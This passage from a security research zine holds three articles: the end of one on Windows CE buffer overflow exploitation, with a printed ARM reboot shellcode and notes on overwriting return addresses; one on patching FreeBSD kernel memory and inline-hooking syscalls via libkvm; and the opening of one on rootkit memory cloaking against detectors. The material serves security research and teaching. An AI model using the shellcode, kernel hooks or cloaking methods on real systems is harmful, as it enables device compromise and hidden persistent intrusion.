You must install the EVC environment first. After this, we can obtain the necessary opcodes from the EVC debugger, IDAPro or a hex editor.

8 - System Call

First, let's look at the implementation of an API in coredll.dll:

[content omitted, please see electronic version]

Debugging into this API, we found that the system checks KTHRDINFO first. This value is initialized in the MDCreateMainThread2 function of PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdram.c:

...
if (kmode || bAllKMode) {
    pTh->ctx.Psr = KERNEL_MODE;
    KTHRDINFO (pTh) |= UTLS_INKMODE;
} else {
    pTh->ctx.Psr = USER_MODE;
    KTHRDINFO (pTh) &= ~UTLS_INKMODE;
}
...

If the application is in kernel mode, this value will be set to 1, otherwise it will be 0. All applications on Pocket PC run in kernel mode, so the system continues with LDRNE R0, [R4].
In my environment, R0 got 0x8004B138, which is the ppfnMethods pointer of SystemAPISets[SH_WIN32], and execution then flows to LDRNE R1, [R0,#0x13C]. Let's look at the offset 0x13C (0x13C/4 = 0x4F) and the corresponding index in Win32Methods, defined in PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h:

const PFNVOID Win32Methods[] = {
...
    (PFNVOID)SC_PowerOffSystem, // 79
...
};

Well, R1 got the address of SC_PowerOffSystem, which is implemented in the kernel. The instruction LDREQ R1, =0xF000FEC4 has no effect when the application runs in kernel mode. The address 0xF000FEC4 is the system call used by user mode. Some APIs use the system call directly, such as SetKMode:

.text:01F756C0         EXPORT SetKMode
.text:01F756C0 SetKMode
.text:01F756C0
.text:01F756C0 var_4   = -4
.text:01F756C0
.text:01F756C0         STR     LR, [SP,#var_4]!
.text:01F756C4         LDR     R1, =0xF000FE50
.text:01F756C8         MOV     LR, PC
.text:01F756CC         MOV     PC, R1
.text:01F756D0         LDMFD   SP!, {PC}

Windows CE doesn't use ARM's SWI instruction to implement system calls; it implements them in a different way. A system call is made to an invalid address in the range 0xf0000000 - 0xf0010000, and this causes a prefetch-abort trap, which is handled by PrefetchAbort, implemented in armtrap.s. PrefetchAbort checks the invalid address first. If it is in the trap area, it uses ObjectCall to locate the system call and execute it; otherwise it calls ProcessPrefAbort to deal with the exception.

There is a formula to calculate the system call address:

0xf0010000-(256*apiset+apinr)*4

The api set handles are defined in PUBLIC\COMMON\SDK\INC\kfuncs.h and PUBLIC\COMMON\OAK\INC\psyscall.h, and the apinrs are defined in several files; for example, the SH_WIN32 calls are defined in PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h.

Well, let's calculate the system call of KernelIoControl. The apiset is 0 and the apinr is 99, so the system call is 0xf0010000-(256*0+99)*4, which is 0xF000FE74. The following is the shellcode implemented by system call:

#include "stdafx.h"

int shellcode[] =
{
    0xE59F0014, // ldr r0, [pc, #20]
    0xE59F4014, // ldr r4, [pc, #20]
    0xE3A01000, // mov r1, #0
    0xE3A02000, // mov r2, #0
    0xE3A03000, // mov r3, #0
    0xE1A0E00F, // mov lr, pc
    0xE1A0F004, // mov pc, r4
    0x0101003C, // IOCTL_HAL_REBOOT
    0xF000FE74, // trap address of KernelIoControl
};

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    ((void (*)(void)) & shellcode)();
    return 0;
}

It works fine and we don't need to search for API addresses.

9 - Windows CE Buffer Overflow Exploitation

hello.cpp is the demonstration vulnerable program:

[content omitted, please see electronic version]

The hello function has a buffer overflow problem. It reads data from the "binfile" in the root directory into the stack variable "buf" with fread(). Because it reads 1KB of content, the stack variable "buf" will be overflowed if the "binfile" is larger than 512 bytes.

The printf and getchar calls are just for testing. They have no effect without console.dll in the windows directory. The console.dll file comes from the Windows Mobile Developer Power Toys.

ARM assembly language uses the bl instruction to call a function. Let's look into the hello function:

6:    int hello()
7:    {
22011000   str       lr, [sp, #-4]!
22011004   sub       sp, sp, #0x89, 30
8:        FILE * binFileH;
9:        char binFile[] = "\\binfile";
...
...
26:   }
220110C4   add       sp, sp, #0x89, 30
220110C8   ldmia     sp!, {pc}

"str lr, [sp, #-4]!" is the first instruction of the hello() function. It stores the lr register on the stack, and the lr register contains the return address of hello's caller. The second instruction prepares stack memory for local variables. "ldmia sp!, {pc}" is the last instruction of the hello() function. It loads the return address of hello's caller, which was stored on the stack, into the pc register, and the program then continues in the WinMain function. So overwriting the lr value stored on the stack gives us control when the hello function returns.

The memory addresses of the variables allocated by the program, both stack and heap, depend on the slot the process is loaded into. The process may be loaded into a different slot each time it starts, so the base address always changes.
We know that slot 0 is mapped from the current process' slot, so the base of its stack address is stable.

The following is the exploit for the hello program:

[content omitted, please see electronic version]

We choose a stack address in slot 0 that points to our shellcode. It will overwrite the return address stored on the stack. We could also use a jump address in the virtual memory space of the process instead. This exploit produces a "binfile" that will overflow the "buf" variable and the return address stored on the stack.

After the binfile is copied to the PDA, the PDA restarts and turns on bluetooth when the hello program is executed. That means the hello program flowed into our shellcode.

Then I changed to another method of constructing the exploit string, as follows:

pad...pad|return address|nop...nop...shellcode

The exploit now produces a 1KB "binfile". But the PDA freezes when the hello program is executed. This was confusing. I think the stack of Windows CE may be small, so the overflow string destroyed the 2KB guard at the top of the stack. The system freezes when the program calls an API after the overflow has occurred. So we must pay attention to the features of the stack while writing exploits for Windows CE.

EVC has some bugs that make debugging difficult. First, EVC writes some arbitrary data to the stack contents when the stack is released at the end of a function, so the shellcode may be modified. Second, the instruction at a breakpoint may be changed to 0xE6000010 in EVC while debugging. Another bug is funny: the debugger reports no error when data is written to a .text address during single-step execution, but it catches an access violation exception when the same code is executed directly.

10 - About Decoding Shellcode

The shellcode we talked about above is concept shellcode which contains lots of zeros. It executed correctly in this demonstration program, but some other vulnerable programs may filter special characters before the buffer overflow occurs. For example, if the overflow is caused by strcpy, the shellcode will be cut at the first zero.

It is difficult and inconvenient to write shellcode without special characters using the API search method.
So we think about decoding shellcode. Decoding shellcode converts the special characters into acceptable characters and makes the real shellcode more universal.

Newer ARM processors (such as arm9 and arm10) have a Harvard architecture, which separates the instruction cache from the data cache. This feature improves the performance of the processor, and most RISC processors have it. But self-modifying code is not easy to implement, because it is confused by the caches and by the processor implementation after the code has been modified.

Let's look at the following code first:

[content omitted, please see electronic version]

The four strb instructions change the immediate value of the mov instructions below them to 0x99. Execution breaks at the inserted breakpoint when this code is run directly in the EVC debugger. The r1-r4 registers got 0x99 on the S3C2410, which is an arm9 core processor. When I tested this code on my friend's PDA, which has an Intel XScale processor, it needed more nop instructions as padding after the modification before r1-r4 got 0x99. I think the reason may be that the arm9 has a 5-stage pipeline and the arm10 has a 6-stage pipeline. Well, I changed it to another method:

[content omitted, please see electronic version]

The four mov instructions were encoded by Exclusive-OR with 0x88. The decoder has a loop that loads an encoded byte, Exclusive-ORs it with 0x88 and then stores it back to its original position. The r1-r4 registers won't get 0x1, even if you put a lot of pad instructions after the decoder, on both arm9 and arm10 processors. I think the load instruction may bring on a cache problem.

The ARM Architecture Reference Manual has a chapter that introduces how to deal with self-modifying code. It says the caches will be flushed by an operating system call. Phil, the guy from 0dd, shared his experience with me. He said he has used this method successfully on an ARM system (I think his environment may be Linux). Well, this method is successful on AIX PowerPC and Solaris SPARC too (I've tested it). But SWI is implemented in a different way under Windows CE. armtrap.s contains the implementation of SWIHandler, which does nothing except "movs pc,lr".
So it has no effect after decoding has finished.

Because Pocket PC applications run in kernel mode, we have the privilege to access the system control coprocessor. The ARM Architecture Reference Manual introduces the memory system and how to handle the cache via the system control coprocessor. After looking into this manual, I tried to disable the instruction cache before decoding:

mrc p15, 0, r1, c1, c0, 0
bic r1, r1, #0x1000
mcr p15, 0, r1, c1, c0, 0

But the system froze when the mcr instruction was executed. Then I tried to invalidate the entire instruction cache after decoding:

eor r1, r1, r1
mcr p15, 0, r1, c7, c5, 0

But it has no effect either.

11 - Conclusion

The code discussed above is a real-life buffer overflow example on Windows CE. It is not perfect, but I think this technology will be improved in the future.

Because of the cache mechanism, the decoding shellcode is not good enough.

The Internet and handset devices are growing quickly, so threats to PDAs and mobiles become more and more serious. And patching Windows CE is more difficult and dangerous for customers than patching a normal Windows system. Because the entire Windows CE system is stored in the ROM, you must reflash the ROM if you want to patch system flaws, and the ROM images of various vendors or models of PDAs and mobiles aren't compatible.

12 - Greetings

Special greets to the dudes of XFocus Team, and to my girlfriend: life would fade without you. Special thanks to the Research Department of NSFocus Corporation, I love this team.
And I'll show my appreciation to the 0dd members, Nasiry and Flier too; the discussions with them were nice.

13 - References

[1] ARM Architecture Reference Manual
    http://www.arm.com
[2] Windows CE 4.2 Source Code
    http://msdn.microsoft.com/embedded/windowsce/default.aspx
[3] Details Emerge on the First Windows Mobile Virus, Cyrus Peikari, Seth Fogie, Ratter/29A
    http://www.informit.com/articles/article.asp?p=337071
[4] Pocket PC Abuse, Seth Fogie
    http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-fogie/bh-us-04-fogie-up.pdf
[5] misc notes on the xda and windows ce
    http://www.xs4all.nl/~itsme/projects/xda/
[6] Introduction to Windows CE
    http://www.cs-ipv6.lancs.ac.uk/acsp/WinCE/Slides/
[7] Nasiry's way
    http://www.cnblogs.com/nasiry/
[8] Programming Windows CE Second Edition, Doug Boling
[9] Win32 Assembly Components
    http://LSD-PL.NET


Playing Games with Kernel Memory ... FreeBSD Style
Joseph Kong

1.0 - Introduction

The kernel memory interface or kvm interface was first introduced in SunOS. Although it has been around for quite some time, many people still consider it to be rather obscure.
This article documents the basic usage of the Kernel Data Access Library (libkvm), and will explore some ways to use libkvm (/dev/kmem) in order to alter the behavior of a running FreeBSD system.

FreeBSD kernel hacking skills of a moderate level (i.e. you know how to use ddb), as well as a decent understanding of C and x86 Assembly (AT&T Syntax) are required in order to understand the contents of this article.

This article was written from the perspective of a FreeBSD 5.4 Stable System.

Note: Although the techniques described in this article have been explored in other articles (see References), they are always from a Linux or Windows perspective. I personally only know of one other text that touches on the information contained herein. That text, entitled "Fun and Games with FreeBSD Kernel Modules" by Stephanie Wehner, explained some of the things one can do with libkvm. Considering the fact that one can do much more, and that documentation regarding libkvm is scarce (man pages and source code aside), I decided to write this article.

2.0 - Finding System Calls

Note: This section is extremely basic; if you have a good grasp of the libkvm functions, read the next paragraph and skip to the next section.

Stephanie Wehner wrote a program called checkcall, which would check if sysent[CALL] had been tampered with, and if so would change it back to the original function. In order to help with the debugging during the latter sections of this article, we are going to make use of checkcall's find system call functionality. Following is a stripped down version of checkcall, with just the find system call function. It is also a good example to learn the basics of libkvm from.
A line by line explanation of the libkvm functions appears after the source code listing.

find_syscall.c:

[content omitted, please see electronic version]

There are five functions from libkvm that are included in the above program; they are:

    kvm_openfiles
    kvm_nlist
    kvm_geterr
    kvm_read
    kvm_close

kvm_openfiles:

Basically kvm_openfiles initializes kernel virtual memory access, and returns a descriptor to be used in subsequent kvm library calls. In find_syscall the syntax was as follows:

    kd = kvm_openfiles(NULL, NULL, NULL, O_RDWR, errbuf);

kd is used to store the returned descriptor; if after the call kd equals NULL then an error has occurred.

The first three arguments correspond to const char *execfile, const char *corefile, and const char *swapfiles respectively. However for our purposes they are unnecessary, hence NULL. The fourth argument indicates that we want read/write access. The fifth argument indicates the buffer in which to place any error messages, more on that later.

kvm_nlist:

The man page states that kvm_nlist retrieves the symbol table entries indicated by the name list argument (struct nlist). The members of struct nlist that interest us are as follows:

    char *n_name;           /* symbol name (in memory) */
    unsigned long n_value;  /* address of the symbol */

Prior to calling kvm_nlist in find_syscall a struct nlist array was set up as follows:

    struct nlist nl[] = { { NULL }, { NULL }, { NULL }, };
    nl[0].n_name = "sysent";
    nl[1].n_name = argv[1];

The syntax for calling kvm_nlist is as follows:

    kvm_nlist(kd, nl)

What this did was fill out the n_value member of each element in the array nl with the starting address in memory corresponding to the value in n_name. In other words we now know the location in memory of sysent and the user supplied syscall (argv[1]).
nl was initialized with three elements because kvm_nlist expects as its second argument a NULL terminated array of nlist structures.

kvm_geterr:

As stated in the man page this function returns a string describing the most recent error condition. If you look through the above source code listing you will see kvm_geterr gets called after every libkvm function, except kvm_openfiles. kvm_openfiles uses its own unique form of error reporting, because kvm_geterr requires a descriptor as an argument, which would not exist if kvm_openfiles has not been called yet. An example usage of kvm_geterr follows:

    fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));

kvm_read:

This function is used to read kernel virtual memory. In find_syscall the syntax was as follows:

    kvm_read(kd, addr, &call, sizeof(struct sysent))

The first argument is the descriptor. The second is the address to begin reading from. The third argument is the user-space location to store the data read. The fourth argument is the number of bytes to read.

kvm_close:

This function breaks the connection between the pointer and the kernel virtual memory established with kvm_openfiles. In find_syscall this function was called as follows:

    kvm_close(kd)

The following is an algorithmic explanation of find_syscall.c:

1. Check to make sure the user has supplied a syscall name and number. (No error checking, just checks for two arguments)
2. Set up the array of nlist structures appropriately.
3. Initialize kernel virtual memory access. (kvm_openfiles)
4. Find the address of sysent and the user supplied syscall. (kvm_nlist)
5. Calculate the location of the syscall in sysent.
6. Copy the syscall's sysent structure from kernel-space to user-space. (kvm_read)
7. Print out the location of the syscall in the sysent structure and the location of the executed function.
8. Close the descriptor (kvm_close)

In order to verify that the output of find_syscall is accurate, one can make use of ddb as follows:

Note: The output below was modified in order to meet the 75 character per line requirement.

[content omitted, please see electronic version]

3.0 - Understanding Call Statements And Bytecode Injection

In x86 Assembly a Call statement is a control transfer instruction, used to call a procedure. There are two types of Call statements, Near and Far; for the purposes of this article one only needs to understand a Near Call. The following code illustrates the details of a Near Call statement (in Intel Syntax):

    0200  BB1295  MOV BX,9512
    0203  E8FA00  CALL 0300
    0206  B82F14  MOV AX,142F

In the above code snippet, when the IP (Instruction Pointer) gets to 0203 it will jump to 0300. The hexadecimal representation for CALL is E8, however FA00 is not 0300. 0x300 - 0x206 = 0xFA. In a near call the IP address of the instruction after the Call is saved on the stack, so the called procedure knows where to return to. This explains why the operand for Call in this example is 0xFA00 and not 0x300. This is an important point and will come into play later.

One of the more entertaining things one can do with the libkvm functions is patch kernel virtual memory. As always we start with a very simple example ... Hello World! The following is a kld which adds a syscall that functions as a Hello World! program.

hello.c:

[content omitted, please see electronic version]

The following is the user-space program for the above kld:

interface.c:

    #include
    #include
    #include
    #include

    int main(int argc, char **argv) {
        return syscall(210);
    }

If we compile the above kld using a standard Makefile, load it, and then run the user-space program, we get some very annoying output.
In order to make this syscall less annoying we can use the following program. As before, an explanation of any new functions and concepts appears after the source code listing.

test_call.c:

[content omitted, please see electronic version]

The only libkvm function that is included in the above program that hasn't been discussed before is kvm_write.

kvm_write:

This function is used to write to kernel virtual memory. In test_call the syntax was as follows:

    kvm_write(kd, nl[0].n_value, code, sizeof(code))

The first argument is the descriptor. The second is the address to begin writing to. The third argument is the user-space location to read from. The fourth argument is the number of bytes to write.

The replacement code (bytecode) in test_call was generated with the help of objdump.

[content omitted, please see electronic version]

Note: Your output may vary depending on your compiler version and flags.

Comparing the output of the text section with the bytecode in test_call one can see that they are essentially the same, minus setting up nine more calls to printf. An important item to take note of is when objdump reports something as being relative. In this case two items are: movl $0x5ed,(%esp) (sets up the string to be printed) and call printf. Which brings us to ...

In test_call there are two #define statements, they are:

    #define OFFSET_1 0xed
    #define OFFSET_2 0x12

The first represents the address of the string to be printed relative to the beginning of syscall hello (the number is derived from the output of objdump). While the second represents the offset of the instruction following the call to printf in the bytecode. Later on in test_call there are these four statements:

    /* Calculate the correct offsets */
    offset_1 = nl[0].n_value + OFFSET_1;
    offset_2 = nl[0].n_value + OFFSET_2;

    /* Set the code to contain the correct addresses */
    *(unsigned long *)&code[9] = offset_1;
    *(unsigned long *)&code[14] = nl[1].n_value - offset_2;

From the comments it should be obvious what these four statements do.
code[9] is the section in bytecode where the address of the string to be printed is stored. code[14] is the operand for the call statement; address of printf - address of the next statement.

The following is the output before and after running test_call:

[content omitted, please see electronic version]

4.0 - Allocating Kernel Memory

Being able to just patch kernel memory has its limitations since you don't have much room to play with. Being able to allocate kernel memory alleviates this problem. The following is a kld which does just that.

kmalloc.c:

[content omitted, please see electronic version]

The following is the user-space program for the above kld:

interface.c:

[content omitted, please see electronic version]

Using the techniques/functions described in the previous two sections and the following algorithm coined by Silvio Cesare one can allocate kernel memory without the use of a kld.

Silvio Cesare's kmalloc from user-space algorithm:

1. Get the address of some syscall
2. Write a function which will allocate kernel memory
3. Save sizeof(our_function) bytes of some syscall
4. Overwrite some syscall with our_function
5. Call newly overwritten syscall
6. Restore syscall

test_kmalloc.c:

[content omitted, please see electronic version]

Using ddb one can verify the results of the above program as follows:

[content omitted, please see electronic version]

5.0 - Putting It All Together

Knowing how to patch and allocate kernel memory gives one a lot of freedom. This last section will demonstrate how to apply a call hook using the techniques described in the previous sections. Typically call hooks on FreeBSD are done by changing the sysent and having it point to another function; we will not be doing this. Instead we will be using the following algorithm (with a few minor twists, shown later):

1. Copy syscall we want to hook
2. Allocate kernel memory (use technique described in previous section)
3. Place new routine in newly allocated address space
4. Overwrite first 7 bytes of syscall with an instruction to jump to new routine
5. Execute new routine, plus the first x bytes of syscall (this step will become clearer later)
6. Jump back to syscall + offset, where offset is equal to x

Stealing an idea from pragmatic of THC we will hook mkdir to print out a debug message. The following is the kld used in conjunction with objdump in order to extract the bytecode required for the call hook.

hacked_mkdir.c:

[content omitted, please see electronic version]

The following is an example program which hooks mkdir to print out a simple debug message. As always an explanation of any new concepts appears after the source code listing.

test_hook.c:

[content omitted, please see electronic version]

The comments state that the algorithm for this program is as follows:

1. Copy mkdir syscall up to but not including \xe8.
2. Allocate kernel memory.
3. Place new routine in newly allocated address space.
4. Overwrite first 7 bytes of mkdir syscall with an instruction to jump to new routine.
5. Execute new routine, plus the first x bytes of mkdir syscall. Where x is equal to the number of bytes copied from step 1.
6. Jump back to mkdir syscall + offset. Where offset is equal to the location of \xe8.

The reason behind copying mkdir up to but not including \xe8 is that on different builds of FreeBSD the disassembly of the mkdir syscall is different. Therefore one cannot determine a static location to jump back to. However, on all builds of FreeBSD mkdir makes a call to kern_mkdir, thus we choose to jump back to that point.
The following illustrates this.

[content omitted, please see electronic version]

The above output was generated from two different FreeBSD 5.4 builds. As one can clearly see, the disassembly dump of mkdir is different for each one.

In test_hook the address of kern_rmdir is sought after; this is because in memory kern_rmdir comes right after mkdir, thus its address is the end boundary for mkdir.

The bytecode for the call hook is as follows:

[content omitted, please see electronic version]

The first 20 bytes are for the string to be printed; because of this, when we jump to this function we have to start at an offset of 0x14, as illustrated by this line of code:

    *(unsigned long *)&jp_code[1] = (unsigned long)kma.addr + 0x14;

The last three statements in the hacked_mkdir bytecode zero out the eax register, clean up the stack, and restore the ebp register. This is done so that when mkdir actually executes it's as if nothing has already occurred.

One thing to remember about character arrays in C is that they are all null terminated. For example if we declare the following variable,

    unsigned char example[] = "\x41";

sizeof(example) will return 2. This is the reason why in test_hook we subtract 1 from sizeof(ha_code), otherwise we would be writing to the wrong spot.

The following is the output before and after running test_hook:

[content omitted, please see electronic version]

One could also use find_syscall and ddb to verify the results of test_hook.

6.0 - Concluding Remarks

Being able to patch and allocate kernel memory gives one a lot of power over a system. All the examples in this article are trivial as it was my intention to show the how not the what.
Other authors have better ideas than me anyways on what to do (see References).

I would like to take this space to apologize if any of my explanations are unclear; hopefully reading over the source code and looking at the output makes up for it.

Finally, I would like to thank Silvio Cesare, pragmatic, and Stephanie Wehner, for the inspiration/ideas.

7.0 - References

[1] Silvio Cesare, Runtime Kernel Kmem Patching
    http://reactor-core.org/runtime-kernel-patching.html
[2] devik & sd, Linux on-the-fly kernel patching without LKM
    http://www.phrack.org/show.php?p=58&a=7
[3] pragmatic, Attacking FreeBSD with Kernel Modules
    http://www.thc.org/papers/bsdkern.html
[4] Andrew Reiter, Dynamic Kernel Linker (KLD) Facility Programming Tutorial
    http://ezine.daemonnews.org/200010/blueprints.html
[5] Stephanie Wehner, Fun and Games with FreeBSD Kernel Modules
    http://www.r4k.net/mod/fbsdfun.html
[6] Muhammad Ali Mazidi & Janice Gillispie Mazidi, The 80x86 IBM PC And Compatible Computers: Assembly Language, Design, And Interfacing (Prentice Hall)


Raising The Bar For Windows Rootkit Detection
Jamie Butler and Sherri Sparks

0 - Introduction & Background

Rootkits have historically demonstrated a co-evolutionary adaptation and response to the development of defensive technologies designed to apprehend their subversive agenda. If we trace the evolution of rootkit technology, this pattern is evident.

First generation rootkits were primitive. They simply replaced / modified key system files on the victim's system. The UNIX login program was a common target and involved an attacker replacing the original binary with a maliciously enhanced version that logged user passwords. Because these early rootkit modifications were limited to system files on disk, they motivated the development of file system integrity checkers such as Tripwire [1].

In response, rootkit developers moved their modifications off disk to the memory images of the loaded programs and, again, evaded detection.
These second generation rootkits were primarily based upon hooking techniques that altered the execution path by making memory patches to loaded applications and some operating system components such as the system call table. Although much stealthier, such modifications remained detectable by searching for heuristic abnormalities. For example, it is suspicious for the system service table to contain pointers that do not point to the operating system kernel. This is the technique used by VICE [2]. Third generation kernel rootkit techniques like Direct Kernel Object Manipulation (DKOM), which was implemented in the FU rootkit [3], capitalize on the weaknesses of current detection software by modifying dynamically changing kernel data structures for which it is impossible to establish a static trusted baseline.

0.1 - Motivations

There are public rootkits which illustrate all of these various techniques, but even the most sophisticated Windows kernel rootkits, like FU, possess an inherent flaw. They subvert essentially all of the operating system's subsystems with one exception: memory management. Kernel rootkits can control the execution path of kernel code, alter kernel data, and fake system call return values, but they have not (yet) demonstrated the capability to hook or fake the contents of memory seen by other running applications. In other words, public kernel rootkits are sitting ducks for in-memory signature scans. Only now are security companies beginning to think of implementing memory signature scans.

Hiding from memory scans is similar to the problem faced by early viruses attempting to hide on the file system. Virus writers reacted to anti-virus programs scanning the file system by developing polymorphic and metamorphic techniques to evade detection. Polymorphism attempts to alter the binary image of a virus by replacing blocks of code with functionally equivalent blocks that appear different (i.e.
use different opcodes to perform the same task). Polymorphic code, therefore, alters the superficial appearance of a block of code, but it does not fundamentally alter a scanner's view of that region of system memory.

Traditionally, there have been three general approaches to malicious code detection: misuse detection, which relies upon known code signatures; anomaly detection, which relies upon heuristics and statistical deviations from normal behavior; and integrity checking, which relies upon comparing current snapshots of the file system or memory with a known, trusted baseline. A polymorphic rootkit (or virus) effectively evades signature based detection of its code body, but falls short in anomaly or integrity detection schemes because it cannot easily camouflage the changes it makes to existing binary code in other system components.

Now imagine a rootkit that makes no effort to change its superficial appearance, yet is capable of fundamentally altering a detector's view of an arbitrary region of memory. When the detector attempts to read any region of memory modified by the rootkit, it sees a normal, unaltered view of memory. Only the rootkit sees the true, altered view of memory. Such a rootkit is clearly capable of compromising all of the primary detection methodologies to varying degrees. The implications to misuse detection are obvious. A scanner attempts to read the memory for the loaded rootkit driver looking for a code signature and the rootkit simply returns a random, fake view of memory (i.e. which does not include its own code) to the scanner.
There are also implications for integrity validation approaches to detection. In these cases, the rootkit returns the unaltered view of memory to all processes other than itself. The integrity checker sees the unaltered code, finds a matching CRC or hash, and (erroneously) assumes that all is well. Finally, any anomaly detection methods which rely upon identifying deviant structural characteristics will be fooled since they will receive a normal view of the code. An example of this might be a scanner like VICE which attempts to heuristically identify inline function hooks by the presence of a direct jump at the beginning of the function body.

Current rootkits, with the exception of Hacker Defender [4], have made little or no effort to introduce viral polymorphism techniques. As stated previously, while a valuable technique, polymorphism is not a comprehensive solution to the problem for a rootkit because the rootkit cannot easily camouflage the changes it must make to existing code in order to install its hooks. Our objective, therefore, is to show proof of concept that the current architecture permits subversion of memory management such that a non polymorphic kernel mode rootkit (or virus) is capable of controlling the view of memory regions seen by the operating system and other processes with a minimal performance hit. The end result is that it is possible to hide a known public rootkit driver (for which a code signature exists) from detection. To this end, we have designed an enhanced version of the FU rootkit. In section 1, we discuss the basic techniques used to detect a rootkit. In section 2, we give a background summary of the x86 memory architecture. Section 3 outlines the concept of memory cloaking and a proof of concept implementation for our enhanced rootkit. Finally, we conclude with a discussion of its detectability, limitations, future extensibility, and performance impact.
Without further ado, we bid you welcome to 4th generation rootkit technology.

1 - Rootkit Detection

Until several months ago, rootkit detection was largely ignored by security vendors. Many mistakenly classified rootkits in the same category as other viruses and malware. Because of this, security companies continued to use the same detection methods, the most prominent one being signature scans on the file system. This is only partially effective. Once a rootkit is loaded in memory it can delete itself on disk, hide its files, or even divert an attempt to open the rootkit file. In this section, we will examine more recent advances in rootkit detection.

1.1 - Detecting The Effect Of A Rootkit (Heuristics)

One method to detect the presence of a rootkit is to detect how it alters other parameters on the computer system. In this way, the effects of the rootkit are seen although the actual rootkit that caused the deviation may not be known. This solution is a more general approach since no signature for a particular rootkit is necessary. This technique also looks for the rootkit in memory and not on the file system.

One effect of a rootkit is that it usually alters the execution path of a normal program. By inserting itself in the middle of a program's execution, the rootkit can act as a middle man between the kernel functions the program relies upon and the program. With this position of power, the rootkit can alter what the program sees and does. For example, the rootkit could return a handle to a log file that is different from the one the program intended to open, or the rootkit could change the destination of network communication. These rootkit patches or hooks cause extra instructions to be executed. When a patched function is compared to a normal function, the difference in the number of instructions executed can be indicative of a rootkit. This is the technique used by PatchFinder [5]. One of the drawbacks of PatchFinder is that the CPU must be put into single step mode in order to count instructions.
So for every instruction executed an interrupt is fired and must be handled. This slows the performance of the system, which may be unacceptable on a production machine. Also, the actual number of instructions executed can vary even on a clean system.

Another rootkit detection tool called VICE detects the presence of hooks in applications and in the kernel. VICE analyzes the addresses of the functions exported by the operating system looking for hooks. The exported functions are typically the target of rootkits because by filtering certain APIs rootkits can hide. By finding the hooks themselves, VICE avoids the problems associated with instruction counting. However, VICE also relies upon several APIs so it is possible for a rootkit to defeat its hook detection [6]. Currently the biggest weakness of VICE is that it detects all hooks, both malicious and benign. Hooking is a legitimate technique used by many security products.

Another approach to detecting the effects of a rootkit is to identify when the operating system is lying. The operating system exposes a well-known API in order for applications to interact with it. When the rootkit alters the results of a particular API, it is a lie. For example, Windows Explorer may request the number of files in a directory using several functions in the Win32 API. If the rootkit changes the number of files that the application can see, it is a lie. To detect the lie, a rootkit detector needs at least two ways to obtain the same information. Then, both results can be compared. RootkitRevealer [7] uses this technique. It calls the highest level APIs and compares those results with the results of the lowest level APIs. This method can be bypassed by a rootkit if it also hooks at those lowest layers. RootkitRevealer also does not address data alterations. The FU rootkit alters the kernel data structures in order to hide its processes.
RootkitRevealer does not detect this because both the higher and lower layer APIs return the same altered data set. Blacklight from F-Secure [8] also tries to detect deviations from the truth. To detect hidden processes, it relies on an undocumented kernel structure. Just as FU walks the linked list of processes to hide, Blacklight walks a linked list of handle tables in the kernel. Every process has a handle table; therefore, by identifying all the handle tables Blacklight can find a pointer to every process on the computer. FU has been updated to also unhook the hidden process from the linked list of handle tables. This arms race will continue.

1.2 - Detecting the Rootkit Itself (Signatures)

Anti-virus companies have shown that scanning file systems for signatures can be effective; however, it can be subverted. If the attacker camouflages the binary by using a packing routine, the signature may no longer match the rootkit. A signature of the rootkit as it will execute in memory is one way to solve this problem. Some host based intrusion prevention systems (HIPS) try to prevent the rootkit from loading. However, it is extremely difficult to block all the ways code can be loaded in the kernel. Recent papers by Barnaby Jack [9] and Chong [10] have highlighted the threat of kernel exploits, which will allow arbitrary code to be loaded into memory and executed.

Although file system scans and loading detection are needed, perhaps the last layer of detection is scanning memory itself. This provides an added layer of security if the rootkit has bypassed the previous checks. Memory signatures are more reliable because the rootkit must unpack or decrypt in order to execute. Not only can scanning memory be used to find a rootkit, it can be used to verify the integrity of the kernel itself since it has a known signature. Scanning kernel memory is also much faster than scanning everything on disk. Arbaugh et al. [11] have taken this technique to the next level by implementing the scanner on a separate card with its own CPU.

The next section will explain the memory architecture on Intel x86.
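The memory signature scan described in section 1.2 can be sketched in a few lines of C. This is only a minimal illustration under stated assumptions, not the method used by any product named above: the function name find_signature is hypothetical, the "memory" is an ordinary user-space buffer rather than kernel memory, and a real scanner would also have to cope with wildcards, paged-out regions, and multiple signatures.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper: return the offset of the first occurrence of the
 * byte signature sig inside buf, or -1 if the signature is not present.
 * A plain linear scan; buf stands in for a region of memory being read.
 */
static long find_signature(const unsigned char *buf, size_t buf_len,
                           const unsigned char *sig, size_t sig_len)
{
    assert(buf != NULL && sig != NULL);

    if (sig_len == 0 || sig_len > buf_len)
        return -1;

    for (size_t i = 0; i + sig_len <= buf_len; i++) {
        if (memcmp(buf + i, sig, sig_len) == 0)
            return (long)i;   /* signature found at offset i */
    }
    return -1;                /* signature not found */
}
```

For instance, scanning the eight bytes 90 90 55 8B EC E9 10 00 for the signature 55 8B EC E9 gives offset 2. The scan only ever sees what a read of the buffer returns, which is exactly the dependency the rest of this article sets out to exploit.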
2 - Memory Architecture Review

In early computing history, programmers were constrained by the amount of physical memory contained in a system. If a program was too large to fit into memory, it was the programmer's responsibility to divide the program into pieces that could be loaded and unloaded on demand. These pieces were called overlays. Forcing this type of memory management upon user level programmers increased code complexity and programming errors while reducing efficiency. Virtual memory was invented to relieve programmers of these burdens.

2.1 - Virtual Memory - Paging vs. Segmentation

Virtual memory is based upon the separation of the virtual and physical address spaces. The size of the virtual address space is primarily a function of the width of the address bus whereas the size of the physical address space is dependent upon the quantity of RAM installed in the system. Thus, a system possessing a 32 bit bus is capable of addressing 2^32 (or ~4 GB) physical bytes of contiguous memory. It may, however, not have anywhere near that quantity of RAM installed. If this is the case, then the virtual address space will be larger than the physical address space. Virtual memory divides both the virtual and physical address spaces into blocks. If these blocks are all the same size, the system is said to use a paging memory model. If the blocks are of varying sizes, it is considered to be a segmentation model. The x86 architecture is in fact a hybrid, utilizing both segmentation and paging; however, this article focuses primarily upon exploitation of its paging mechanism.

Under a paging model, blocks of virtual memory are referred to as pages and blocks of physical memory are referred to as frames. Each virtual page maps to a designated physical frame. This is what enables the virtual address space seen by programs to be larger than the amount of physically addressable memory (i.e. there may be more pages than physical frames). It also means that virtually contiguous pages do not have to be physically contiguous.
